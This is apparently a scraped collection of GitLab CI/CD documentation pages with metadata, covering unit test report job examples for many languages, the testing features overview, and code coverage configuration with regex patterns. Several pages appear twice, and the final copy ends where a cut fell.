available](https://gitlab.com/Siphonophora/dot-net-cicd-test-logging-demo). ```yaml ## Source code and documentation are here: https://github.com/spekt/junit.testlogger/ Test: stage: test script: - 'dotnet test --test-adapter-path:. --logger:"junit;LogFilePath=..\artifacts\{assembly}-test-result.xml;MethodFormat=Class;FailureBodyFormat=Verbose"' artifacts: when: always paths: - ./**/*test-result.xml reports: junit: - ./**/*test-result.xml ``` ## JavaScript There are a few tools that can produce JUnit report format XML files in JavaScript. ### Jest The [jest-junit](https://github.com/jest-community/jest-junit) npm package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Jest to generate the test reports: ```yaml javascript: image: node:latest stage: test before_script: - 'yarn global add jest' - 'yarn add --dev jest-junit' script: - 'jest --ci --reporters=default --reporters=jest-junit' artifacts: when: always reports: junit: - junit.xml ``` To make the job pass when there are no `.test.js` files with unit tests, add the `--passWithNoTests` flag to the end of the `jest` command in the `script:` section. ### Karma The [Karma-junit-reporter](https://github.com/karma-runner/karma-junit-reporter) npm package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Karma to generate the test reports: ```yaml javascript: stage: test script: - karma start --reporters junit artifacts: when: always reports: junit: - junit.xml ``` ### Mocha The [JUnit Reporter for Mocha](https://github.com/michaelleeallen/mocha-junit-reporter) NPM package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Mocha to generate the test reports: ```yaml javascript: stage: test script: - mocha --reporter mocha-junit-reporter --reporter-options mochaFile=junit.xml artifacts: when: always reports: junit: - junit.xml ``` ## Flutter or Dart This example `.gitlab-ci.yml` file uses the [JUnit Report](https://pub.dev/packages/junitreport) package to convert the `flutter test` output into JUnit report XML format: ```yaml test: stage: test script: - flutter test --machine | tojunit -o report.xml artifacts: when: always reports: junit: - report.xml ``` ## PHP This example uses [PHPUnit](https://phpunit.de/index.html) with the `--log-junit` flag. You can also add this option using [XML](https://docs.phpunit.de/en/11.0/configuration.html#the-junit-element) in the `phpunit.xml` configuration file. ```yaml phpunit: stage: test script: - composer install - vendor/bin/phpunit --log-junit report.xml artifacts: when: always reports: junit: report.xml ``` ## Rust This example uses [cargo2junit](https://crates.io/crates/cargo2junit), which is installed in the current directory. To retrieve JSON output from `cargo test`, you must enable the nightly compiler. ```yaml run unittests: image: rust:latest stage: test before_script: - cargo install --root . cargo2junit script: - cargo test -- -Z unstable-options --format json --report-time | bin/cargo2junit > report.xml artifacts: when: always reports: junit: - report.xml ``` ## Helm This example uses [Helm Unittest](https://github.com/helm-unittest/helm-unittest#docker-usage) plugin, with the `-t junit` flag to format the output to a JUnit report in XML format. ```yaml helm: image: helmunittest/helm-unittest:latest stage: test script: - '-t JUnit -o report.xml -f tests/*[._]test.yaml .' artifacts: reports: junit: report.xml ``` The `-f tests/*[._]test.yaml` flag configures `helm-unittest` to look for files in the `tests/` directory that end in either: - `.test.yaml` - `_test.yaml`
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Unit test report examples breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [Unit test reports](unit_test_reports.md) can be generated for many languages and packages. Use these examples as guidelines for configuring your pipeline to generate unit test reports for the listed languages and packages. You might need to edit the examples to match the version of the language or package you are using. ## Ruby Use the following job in `.gitlab-ci.yml`. This includes the `artifacts:paths` keyword to provide a link to the Unit test report output file. ```yaml ## Use https://github.com/sj26/rspec_junit_formatter to generate a JUnit report format XML file with rspec ruby: image: ruby:3.0.4 stage: test before_script: - apt-get update -y && apt-get install -y bundler script: - bundle install - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml artifacts: when: always paths: - rspec.xml reports: junit: rspec.xml ``` ## Go Use the following job in `.gitlab-ci.yml`: ```yaml ## Use https://github.com/gotestyourself/gotestsum to generate a JUnit report format XML file with go golang: stage: test script: - go install gotest.tools/gotestsum@latest - gotestsum --junitfile report.xml --format testname artifacts: when: always reports: junit: report.xml ``` ## Java There are a few tools that can produce JUnit report format XML file in Java. ### Gradle In the following example, `gradle` is used to generate the test reports. If there are multiple test tasks defined, `gradle` generates multiple directories under `build/test-results/`. In that case, you can leverage glob matching by defining the following path: `build/test-results/test/**/TEST-*.xml`: ```yaml java: stage: test script: - gradle test artifacts: when: always reports: junit: build/test-results/test/**/TEST-*.xml ``` ### Maven For parsing [Surefire](https://maven.apache.org/surefire/maven-surefire-plugin/) and [Failsafe](https://maven.apache.org/surefire/maven-failsafe-plugin/) test reports, use the following job in `.gitlab-ci.yml`: ```yaml java: stage: test script: - mvn verify artifacts: when: always reports: junit: - target/surefire-reports/TEST-*.xml - target/failsafe-reports/TEST-*.xml ``` ## Python example This example uses pytest with the `--junitxml=report.xml` flag to format the output into the JUnit report XML format: ```yaml pytest: stage: test script: - pytest --junitxml=report.xml artifacts: when: always reports: junit: report.xml ``` ## C/C++ There are a few tools that can produce JUnit report format XML files in C/C++. ### GoogleTest In the following example, `gtest` is used to generate the test reports. If there are multiple `gtest` executables created for different architectures (`x86`, `x64` or `arm`), you are required to run each test providing a unique filename. The results are then aggregated together. ```yaml cpp: stage: test script: - gtest.exe --gtest_output="xml:report.xml" artifacts: when: always reports: junit: report.xml ``` ### CUnit [CUnit](https://cunity.gitlab.io/cunit/) can be made to produce [JUnit report format XML files](https://cunity.gitlab.io/cunit/group__CI.html) automatically when run using its `CUnitCI.h` macros: ```yaml cunit: stage: test script: - ./my-cunit-test artifacts: when: always reports: junit: ./my-cunit-test.xml ``` ## .NET The [JunitXML.TestLogger](https://www.nuget.org/packages/JunitXml.TestLogger/) NuGet package can generate test reports for .Net Framework and .Net Core applications. The following example expects a solution in the root folder of the repository, with one or more project files in sub-folders. One result file is produced per test project, and each file is placed in the artifacts folder. This example includes optional formatting arguments, which improve the readability of test data in the test widget. A full .Net Core [example is available](https://gitlab.com/Siphonophora/dot-net-cicd-test-logging-demo). ```yaml ## Source code and documentation are here: https://github.com/spekt/junit.testlogger/ Test: stage: test script: - 'dotnet test --test-adapter-path:. --logger:"junit;LogFilePath=..\artifacts\{assembly}-test-result.xml;MethodFormat=Class;FailureBodyFormat=Verbose"' artifacts: when: always paths: - ./**/*test-result.xml reports: junit: - ./**/*test-result.xml ``` ## JavaScript There are a few tools that can produce JUnit report format XML files in JavaScript. ### Jest The [jest-junit](https://github.com/jest-community/jest-junit) npm package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Jest to generate the test reports: ```yaml javascript: image: node:latest stage: test before_script: - 'yarn global add jest' - 'yarn add --dev jest-junit' script: - 'jest --ci --reporters=default --reporters=jest-junit' artifacts: when: always reports: junit: - junit.xml ``` To make the job pass when there are no `.test.js` files with unit tests, add the `--passWithNoTests` flag to the end of the `jest` command in the `script:` section. ### Karma The [Karma-junit-reporter](https://github.com/karma-runner/karma-junit-reporter) npm package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Karma to generate the test reports: ```yaml javascript: stage: test script: - karma start --reporters junit artifacts: when: always reports: junit: - junit.xml ``` ### Mocha The [JUnit Reporter for Mocha](https://github.com/michaelleeallen/mocha-junit-reporter) NPM package can generate test reports for JavaScript applications. In the following `.gitlab-ci.yml` example, the `javascript` job uses Mocha to generate the test reports: ```yaml javascript: stage: test script: - mocha --reporter mocha-junit-reporter --reporter-options mochaFile=junit.xml artifacts: when: always reports: junit: - junit.xml ``` ## Flutter or Dart This example `.gitlab-ci.yml` file uses the [JUnit Report](https://pub.dev/packages/junitreport) package to convert the `flutter test` output into JUnit report XML format: ```yaml test: stage: test script: - flutter test --machine | tojunit -o report.xml artifacts: when: always reports: junit: - report.xml ``` ## PHP This example uses [PHPUnit](https://phpunit.de/index.html) with the `--log-junit` flag. You can also add this option using [XML](https://docs.phpunit.de/en/11.0/configuration.html#the-junit-element) in the `phpunit.xml` configuration file. ```yaml phpunit: stage: test script: - composer install - vendor/bin/phpunit --log-junit report.xml artifacts: when: always reports: junit: report.xml ``` ## Rust This example uses [cargo2junit](https://crates.io/crates/cargo2junit), which is installed in the current directory. To retrieve JSON output from `cargo test`, you must enable the nightly compiler. ```yaml run unittests: image: rust:latest stage: test before_script: - cargo install --root . cargo2junit script: - cargo test -- -Z unstable-options --format json --report-time | bin/cargo2junit > report.xml artifacts: when: always reports: junit: - report.xml ``` ## Helm This example uses [Helm Unittest](https://github.com/helm-unittest/helm-unittest#docker-usage) plugin, with the `-t junit` flag to format the output to a JUnit report in XML format. ```yaml helm: image: helmunittest/helm-unittest:latest stage: test script: - '-t JUnit -o report.xml -f tests/*[._]test.yaml .' artifacts: reports: junit: report.xml ``` The `-f tests/*[._]test.yaml` flag configures `helm-unittest` to look for files in the `tests/` directory that end in either: - `.test.yaml` - `_test.yaml`
https://docs.gitlab.com/ci/testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Test with GitLab CI/CD and generate reports in merge requests
Unit tests, integration tests, test reports, coverage, and quality assurance.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use GitLab CI/CD to test the changes included in a feature branch. You can also display reports or link to important information directly from [merge requests](../../user/project/merge_requests/_index.md). | Feature | Description | | --------------------------------------------------------------------------------------- | ----------- | | [Accessibility Testing](accessibility_testing.md) | Automatically report A11y violations for changed pages in merge requests. | | [Browser Performance Testing](browser_performance_testing.md) | Quickly determine the browser performance impact of pending code changes. | | [Load Performance Testing](load_performance_testing.md) | Quickly determine the server performance impact of pending code changes. | | [Code coverage](code_coverage/_index.md) | View test coverage results in merge requests, line-by-line coverage in file diffs, and overall metrics. | | [Code Quality](code_quality.md) | Analyze your source code quality using the [Code Climate](https://codeclimate.com/) analyzer and show the Code Climate report right in the merge request widget area. | | [Display arbitrary job artifacts](../yaml/_index.md#artifactsexpose_as) | Configure CI pipelines with the `artifacts:expose_as` parameter to directly link to selected [artifacts](../jobs/job_artifacts.md) in merge requests. | | [Unit test reports](unit_test_reports.md) | Configure your CI jobs to use Unit test reports, and let GitLab display a report on the merge request so that it's easier and faster to identify the failure without having to check the entire job log. | | [License Scanning](../../user/compliance/license_scanning_of_cyclonedx_files/_index.md) | Manage the licenses of your dependencies. | | [Metrics reports](metrics_reports.md) | Track custom metrics like memory usage and performance between branches in merge requests. | | [Fail fast testing](fail_fast_testing.md) | Run a subset of your RSpec test suite, so failed tests stop the pipeline before the full suite of tests run, saving resources. | ## Security Reports {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} In addition to the previous reports listed, GitLab can do many types of [Security reports](../../user/application_security/_index.md), generated by scanning and reporting any vulnerabilities found in your project: | Feature | Description | |----------------------------------------------------------------------------------------------|-------------| | [Container Scanning](../../user/application_security/container_scanning/_index.md) | Analyze your Docker images for known vulnerabilities. | | [Dynamic Application Security Testing (DAST)](../../user/application_security/dast/_index.md) | Analyze your running web applications for known vulnerabilities. | | [Dependency Scanning](../../user/application_security/dependency_scanning/_index.md) | Analyze your dependencies for known vulnerabilities. | | [Static Application Security Testing (SAST)](../../user/application_security/sast/_index.md) | Analyze your source code for known vulnerabilities. |
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Test with GitLab CI/CD and generate reports in merge requests description: Unit tests, integration tests, test reports, coverage, and quality assurance. breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use GitLab CI/CD to test the changes included in a feature branch. You can also display reports or link to important information directly from [merge requests](../../user/project/merge_requests/_index.md). | Feature | Description | | --------------------------------------------------------------------------------------- | ----------- | | [Accessibility Testing](accessibility_testing.md) | Automatically report A11y violations for changed pages in merge requests. | | [Browser Performance Testing](browser_performance_testing.md) | Quickly determine the browser performance impact of pending code changes. | | [Load Performance Testing](load_performance_testing.md) | Quickly determine the server performance impact of pending code changes. | | [Code coverage](code_coverage/_index.md) | View test coverage results in merge requests, line-by-line coverage in file diffs, and overall metrics. | | [Code Quality](code_quality.md) | Analyze your source code quality using the [Code Climate](https://codeclimate.com/) analyzer and show the Code Climate report right in the merge request widget area. | | [Display arbitrary job artifacts](../yaml/_index.md#artifactsexpose_as) | Configure CI pipelines with the `artifacts:expose_as` parameter to directly link to selected [artifacts](../jobs/job_artifacts.md) in merge requests. | | [Unit test reports](unit_test_reports.md) | Configure your CI jobs to use Unit test reports, and let GitLab display a report on the merge request so that it's easier and faster to identify the failure without having to check the entire job log. | | [License Scanning](../../user/compliance/license_scanning_of_cyclonedx_files/_index.md) | Manage the licenses of your dependencies. | | [Metrics reports](metrics_reports.md) | Track custom metrics like memory usage and performance between branches in merge requests. | | [Fail fast testing](fail_fast_testing.md) | Run a subset of your RSpec test suite, so failed tests stop the pipeline before the full suite of tests run, saving resources. | ## Security Reports {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} In addition to the previous reports listed, GitLab can do many types of [Security reports](../../user/application_security/_index.md), generated by scanning and reporting any vulnerabilities found in your project: | Feature | Description | |----------------------------------------------------------------------------------------------|-------------| | [Container Scanning](../../user/application_security/container_scanning/_index.md) | Analyze your Docker images for known vulnerabilities. | | [Dynamic Application Security Testing (DAST)](../../user/application_security/dast/_index.md) | Analyze your running web applications for known vulnerabilities. | | [Dependency Scanning](../../user/application_security/dependency_scanning/_index.md) | Analyze your dependencies for known vulnerabilities. | | [Static Application Security Testing (SAST)](../../user/application_security/sast/_index.md) | Analyze your source code for known vulnerabilities. |
https://docs.gitlab.com/ci/testing/code_coverage
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/testing/_index.md
2025-08-13
doc/ci/testing/code_coverage
[ "doc", "ci", "testing", "code_coverage" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Code coverage
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Configure code coverage to track and visualize how much of your source code is covered by tests. You can: - Track overall coverage metrics and trends using the `coverage` keyword. - Visualize line-by-line coverage using the `artifacts:reports:coverage_report` keyword. ## Configure coverage reporting Use the [`coverage`](../../yaml/_index.md#coverage) keyword to monitor your test coverage and enforce coverage requirements in merge requests. With coverage reporting, you can: - Display the overall coverage percentage in merge requests. - Aggregate coverage from multiple test jobs. - Add coverage check approval rules. - Track coverage trends over time. To configure coverage reporting: 1. Add the `coverage` keyword to your pipeline configuration: ```yaml test-unit: script: - coverage run unit/ coverage: '/TOTAL.+ ([0-9]{1,3}%)/' test-integration: script: - coverage run integration/ coverage: '/TOTAL.+ ([0-9]{1,3}%)/' ``` 1. Configure the regular expression (regex) to match your test output format. See [coverage regex patterns](#coverage-regex-patterns) for common patterns. 1. To aggregate coverage from multiple jobs, add the `coverage` keyword to each job you want to include. 1. Optional. [Add a coverage check approval rule](#add-a-coverage-check-approval-rule). ### Coverage regex patterns The following sample regex patterns were designed to parse coverage output from common test coverage tools. Test the regex patterns carefully. Tool output formats can change over time, and these patterns might no longer work as expected. <!-- vale gitlab_base.Spelling = NO --> <!-- markdownlint-disable MD056 --> <!-- Verify regex patterns carefully, especially patterns containing the pipe (`|`) character. To use `|` in the text of a table cell (not as cell delimiters), you must escape it with a backslash (`\|`). Verify all tables render as expected both in GitLab and on docs.gitlab.com. See: https://docs.gitlab.com/user/markdown/#tables --> {{< tabs >}} {{< tab title="Python and Ruby" >}} | Tool | Language | Command | Regex pattern | |------------|----------|----------------|---------------| | pytest-cov | Python | `pytest --cov` | `/TOTAL.*? (100(?:\.0+)?\%\|[1-9]?\d(?:\.\d+)?\%)$/` | | Simplecov | Ruby | `rspec spec` | `/(?:LOC\s\(\d+\.\d+%\|Line Coverage:\s\d+\.\d+%)/` | {{< /tab >}} {{< tab title="C/C++ and Rust" >}} | Tool | Language | Command | Regex pattern | |-----------|----------|-------------------|---------------| | gcovr | C/C++ | `gcovr` | `/^TOTAL.*\s+(\d+\%)$/` | | tarpaulin | Rust | `cargo tarpaulin` | `/^\d+.\d+% coverage/` | {{< /tab >}} {{< tab title="Java and JVM" >}} | Tool | Language | Command | Regex pattern | |-----------|-------------|------------------------------------|---------------| | JaCoCo | Java/Kotlin | `./gradlew test jacocoTestReport` | `/Total.*?([0-9]{1,3})%/` | | Scoverage | Scala | `sbt coverage test coverageReport` | `/(?i)total.*? (100(?:\.0+)?\%\|[1-9]?\d(?:\.\d+)?\%)$/` | {{< /tab >}} {{< tab title="Node.js" >}} | Tool | Command | Regex pattern | |------|--------------------------------------|---------------| | tap | `tap --coverage-report=text-summary` | `/^Statements\s*:\s*([^%]+)/` | | nyc | `nyc npm test` | `/All files[^\|]*\|[^\|]*\s+([\d\.]+)/` | | jest | `jest --ci --coverage` | `/All files[^\|]*\|[^\|]*\s+([\d\.]+)/` | {{< /tab >}} {{< tab title="PHP" >}} | Tool | Command | Regex pattern | |---------|------------------------------------------|---------------| | pest | `pest --coverage --colors=never` | `/Statement coverage[A-Za-z\.*]\s*:\s*([^%]+)/` | | phpunit | `phpunit --coverage-text --colors=never` | `/^\s*Lines:\s*\d+.\d+\%/` | {{< /tab >}} {{< tab title="Go" >}} | Tool | Command | Regex pattern | |-------------------|------------------|---------------| | go test (single) | `go test -cover` | `/coverage: \d+.\d+% of statements/` | | go test (project) | `go test -coverprofile=cover.profile && go tool cover -func cover.profile` | `/total:\s+\(statements\)\s+\d+.\d+%/` | {{< /tab >}} {{< tab title=".NET and PowerShell" >}} | Tool | Language | Command | Regex pattern | |-----------|------------|---------|---------------| | OpenCover | .NET | None | `/(Visited Points).*\((.*)\)/` | | dotnet test ([MSBuild](https://github.com/coverlet-coverage/coverlet/blob/master/Documentation/MSBuildIntegration.md)) | .NET | `dotnet test` | `/Total\s*\\|*\s(\d+(?:\.\d+)?)/` | | Pester | PowerShell | None | `/Covered (\d{1,3}(\.|,)?\d{0,2}%)/` | {{< /tab >}} {{< tab title="Elixir" >}} | Tool | Command | Regex pattern | |-------------|--------------------|---------------| | excoveralls | None | `/\[TOTAL\]\s+(\d+\.\d+)%/` | | mix | `mix test --cover` | `/\d+.\d+\%\s+\|\s+Total/` | {{< /tab >}} {{< /tabs >}} <!-- vale gitlab_base.Spelling = YES --> <!-- markdownlint-enable MD056 --> ## Coverage visualization Use the [`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report) keyword to view which specific lines of code are covered by tests in merge requests. You can generate coverage reports in these formats: - Cobertura: For multiple languages including Java, JavaScript, Python, and Ruby. - JaCoCo: For Java projects only. Coverage visualization uses [artifacts reports](../../yaml/_index.md#artifactsreports) to: 1. Collect one or more coverage reports, including from wildcard paths. 1. Combine the coverage information from all reports. 1. Display the combined results in merge request diffs. Coverage files are parsed in a background job, so there might be a delay between pipeline completion and the visualization appearing in the merge request. By default, coverage visualization data expires one week after creation. ### Configure coverage visualization To configure coverage visualization: 1. Configure your test tool to generate a coverage report. 1. Add the `artifacts:reports:coverage_report` configuration to your pipeline: ```yaml test: script: - run tests with coverage artifacts: reports: coverage_report: coverage_format: cobertura # or jacoco path: coverage/coverage.xml ``` For language-specific configuration details see: - [Cobertura coverage report](cobertura.md) - [JaCoCo coverage report](jacoco.md) ### Coverage reports from child pipelines Coverage reports from child pipelines appear in merge request diff annotations but not in the merge request widget. This happens because parent pipelines cannot access coverage report artifacts generated by child pipelines. Support for displaying coverage reports from child pipeline in the merge request widget is proposed in [epic 8205](https://gitlab.com/groups/gitlab-org/-/epics/8205). ## Add a coverage check approval rule {{< details >}} - Tier: Premium, Ultimate {{< /details >}} You can require specific users or a group to approve merge requests that reduce the project's test coverage. Prerequisites: - [Configure coverage reporting](#configure-coverage-reporting). To add a `Coverage-Check` approval rule: 1. Go to your project and select **Settings > Merge requests**. 1. Under **Merge request approvals**, do one of the following: - Next to the `Coverage-Check` approval rule, select **Enable**. - For manual setup, select **Add approval rule**, then enter `Coverage-Check` as the **Rule name**. 1. Select a **Target branch**. 1. Set the number of **Required number of approvals**. 1. Select the **Users** or **Groups** to provide approval. 1. Select **Save changes**. {{< alert type="note" >}} The `Coverage-Check` approval rule requires approval when the merge base pipeline contains no coverage data, even if the merge request improves overall coverage. {{< /alert >}} ## View coverage results After a pipeline runs successfully, you can view code coverage results in: - Merge request widget: See the coverage percentage and changes compared to the target branch. ![Merge request widget showing code coverage percentage](img/pipelines_test_coverage_mr_widget_v17_3.png) - Merge request diff: Review which lines are covered by tests. Available with Cobertura and JaCoCo reports. - Pipeline jobs: Monitor coverage results for individual jobs. ## View coverage history You can track the evolution of code coverage for your project or group over time. ### For a project To view the code coverage history for a project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Analyze > Repository analytics**. 1. From the dropdown list, select the job you want to view historical data for. 1. Optional. To view a CSV file of the data, select **Download raw data (.csv)**. ### For a group {{< details >}} - Tier: Premium, Ultimate {{< /details >}} To view the code coverage history for all projects in a group: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Analyze > Repository analytics**. 1. Optional. To view a CSV file of the data, select **Download historic test coverage data (.csv)**. ## Display coverage badges Share your project's code coverage status using pipeline badges. To add a coverage badge to your project, see [test coverage report badges](../../../user/project/badges.md#test-coverage-report-badges). ## Troubleshooting ### Remove color codes from code coverage Some test coverage tools output with ANSI color codes that aren't parsed correctly by the regular expression. This causes coverage parsing to fail. Some coverage tools do not provide an option to disable color codes in the output. If so, pipe the output of the coverage tool through a one-line script that strips the color codes. For example: ```shell lein cloverage | perl -pe 's/\e\[?.*?[\@-~]//g' ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Code coverage breadcrumbs: - doc - ci - testing - code_coverage --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Configure code coverage to track and visualize how much of your source code is covered by tests. You can: - Track overall coverage metrics and trends using the `coverage` keyword. - Visualize line-by-line coverage using the `artifacts:reports:coverage_report` keyword. ## Configure coverage reporting Use the [`coverage`](../../yaml/_index.md#coverage) keyword to monitor your test coverage and enforce coverage requirements in merge requests. With coverage reporting, you can: - Display the overall coverage percentage in merge requests. - Aggregate coverage from multiple test jobs. - Add coverage check approval rules. - Track coverage trends over time. To configure coverage reporting: 1. Add the `coverage` keyword to your pipeline configuration: ```yaml test-unit: script: - coverage run unit/ coverage: '/TOTAL.+ ([0-9]{1,3}%)/' test-integration: script: - coverage run integration/ coverage: '/TOTAL.+ ([0-9]{1,3}%)/' ``` 1. Configure the regular expression (regex) to match your test output format. See [coverage regex patterns](#coverage-regex-patterns) for common patterns. 1. To aggregate coverage from multiple jobs, add the `coverage` keyword to each job you want to include. 1. Optional. [Add a coverage check approval rule](#add-a-coverage-check-approval-rule). ### Coverage regex patterns The following sample regex patterns were designed to parse coverage output from common test coverage tools. Test the regex patterns carefully. Tool output formats can change over time, and these patterns might no longer work as expected. <!-- vale gitlab_base.Spelling = NO --> <!-- markdownlint-disable MD056 --> <!-- Verify regex patterns carefully, especially patterns containing the pipe (`|`) character. To use `|` in the text of a table cell (not as cell delimiters), you must escape it with a backslash (`\|`). Verify all tables render as expected both in GitLab and on docs.gitlab.com. See: https://docs.gitlab.com/user/markdown/#tables --> {{< tabs >}} {{< tab title="Python and Ruby" >}} | Tool | Language | Command | Regex pattern | |------------|----------|----------------|---------------| | pytest-cov | Python | `pytest --cov` | `/TOTAL.*? (100(?:\.0+)?\%\|[1-9]?\d(?:\.\d+)?\%)$/` | | Simplecov | Ruby | `rspec spec` | `/(?:LOC\s\(\d+\.\d+%\|Line Coverage:\s\d+\.\d+%)/` | {{< /tab >}} {{< tab title="C/C++ and Rust" >}} | Tool | Language | Command | Regex pattern | |-----------|----------|-------------------|---------------| | gcovr | C/C++ | `gcovr` | `/^TOTAL.*\s+(\d+\%)$/` | | tarpaulin | Rust | `cargo tarpaulin` | `/^\d+.\d+% coverage/` | {{< /tab >}} {{< tab title="Java and JVM" >}} | Tool | Language | Command | Regex pattern | |-----------|-------------|------------------------------------|---------------| | JaCoCo | Java/Kotlin | `./gradlew test jacocoTestReport` | `/Total.*?([0-9]{1,3})%/` | | Scoverage | Scala | `sbt coverage test coverageReport` | `/(?i)total.*? (100(?:\.0+)?\%\|[1-9]?\d(?:\.\d+)?\%)$/` | {{< /tab >}} {{< tab title="Node.js" >}} | Tool | Command | Regex pattern | |------|--------------------------------------|---------------| | tap | `tap --coverage-report=text-summary` | `/^Statements\s*:\s*([^%]+)/` | | nyc | `nyc npm test` | `/All files[^\|]*\|[^\|]*\s+([\d\.]+)/` | | jest | `jest --ci --coverage` | `/All files[^\|]*\|[^\|]*\s+([\d\.]+)/` | {{< /tab >}} {{< tab title="PHP" >}} | Tool | Command | Regex pattern | |---------|------------------------------------------|---------------| | pest | `pest --coverage --colors=never` | `/Statement coverage[A-Za-z\.*]\s*:\s*([^%]+)/` | | phpunit | `phpunit --coverage-text --colors=never` | `/^\s*Lines:\s*\d+.\d+\%/` | {{< /tab >}} {{< tab title="Go" >}} | Tool | Command | Regex pattern | |-------------------|------------------|---------------| | go test (single) | `go test -cover` | `/coverage: \d+.\d+% of statements/` | | go test (project) | `go test -coverprofile=cover.profile && go tool cover -func cover.profile` | `/total:\s+\(statements\)\s+\d+.\d+%/` | {{< /tab >}} {{< tab title=".NET and PowerShell" >}} | Tool | Language | Command | Regex pattern | |-----------|------------|---------|---------------| | OpenCover | .NET | None | `/(Visited Points).*\((.*)\)/` | | dotnet test ([MSBuild](https://github.com/coverlet-coverage/coverlet/blob/master/Documentation/MSBuildIntegration.md)) | .NET | `dotnet test` | `/Total\s*\\|*\s(\d+(?:\.\d+)?)/` | | Pester | PowerShell | None | `/Covered (\d{1,3}(\.|,)?\d{0,2}%)/` | {{< /tab >}} {{< tab title="Elixir" >}} | Tool | Command | Regex pattern | |-------------|--------------------|---------------| | excoveralls | None | `/\[TOTAL\]\s+(\d+\.\d+)%/` | | mix | `mix test --cover` | `/\d+.\d+\%\s+\|\s+Total/` | {{< /tab >}} {{< /tabs >}} <!-- vale gitlab_base.Spelling = YES --> <!-- markdownlint-enable MD056 --> ## Coverage visualization Use the [`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report) keyword to view which specific lines of code are covered by tests in merge requests. You can generate coverage reports in these formats: - Cobertura: For multiple languages including Java, JavaScript, Python, and Ruby. - JaCoCo: For Java projects only. Coverage visualization uses [artifacts reports](../../yaml/_index.md#artifactsreports) to: 1. Collect one or more coverage reports, including from wildcard paths. 1. Combine the coverage information from all reports. 1. Display the combined results in merge request diffs. Coverage files are parsed in a background job, so there might be a delay between pipeline completion and the visualization appearing in the merge request. By default, coverage visualization data expires one week after creation. ### Configure coverage visualization To configure coverage visualization: 1. Configure your test tool to generate a coverage report. 1. Add the `artifacts:reports:coverage_report` configuration to your pipeline: ```yaml test: script: - run tests with coverage artifacts: reports: coverage_report: coverage_format: cobertura # or jacoco path: coverage/coverage.xml ``` For language-specific configuration details see: - [Cobertura coverage report](cobertura.md) - [JaCoCo coverage report](jacoco.md) ### Coverage reports from child pipelines Coverage reports from child pipelines appear in merge request diff annotations but not in the merge request widget. This happens because parent pipelines cannot access coverage report artifacts generated by child pipelines. Support for displaying coverage reports from child pipeline in the merge request widget is proposed in [epic 8205](https://gitlab.com/groups/gitlab-org/-/epics/8205). ## Add a coverage check approval rule {{< details >}} - Tier: Premium, Ultimate {{< /details >}} You can require specific users or a group to approve merge requests that reduce the project's test coverage. Prerequisites: - [Configure coverage reporting](#configure-coverage-reporting). To add a `Coverage-Check` approval rule: 1. Go to your project and select **Settings > Merge requests**. 1. Under **Merge request approvals**, do one of the following: - Next to the `Coverage-Check` approval rule, select **Enable**. - For manual setup, select **Add approval rule**, then enter `Coverage-Check` as the **Rule name**. 1. Select a **Target branch**. 1. Set the number of **Required number of approvals**. 1. Select the **Users** or **Groups** to provide approval. 1. Select **Save changes**. {{< alert type="note" >}} The `Coverage-Check` approval rule requires approval when the merge base pipeline contains no coverage data, even if the merge request improves overall coverage. {{< /alert >}} ## View coverage results After a pipeline runs successfully, you can view code coverage results in: - Merge request widget: See the coverage percentage and changes compared to the target branch. ![Merge request widget showing code coverage percentage](img/pipelines_test_coverage_mr_widget_v17_3.png) - Merge request diff: Review which lines are covered by tests. Available with Cobertura and JaCoCo reports. - Pipeline jobs: Monitor coverage results for individual jobs. ## View coverage history You can track the evolution of code coverage for your project or group over time. ### For a project To view the code coverage history for a project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Analyze > Repository analytics**. 1. From the dropdown list, select the job you want to view historical data for. 1. Optional. To view a CSV file of the data, select **Download raw data (.csv)**. ### For a group {{< details >}} - Tier: Premium, Ultimate {{< /details >}} To view the code coverage history for all projects in a group: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Analyze > Repository analytics**. 1. Optional. To view a CSV file of the data, select **Download historic test coverage data (.csv)**. ## Display coverage badges Share your project's code coverage status using pipeline badges. To 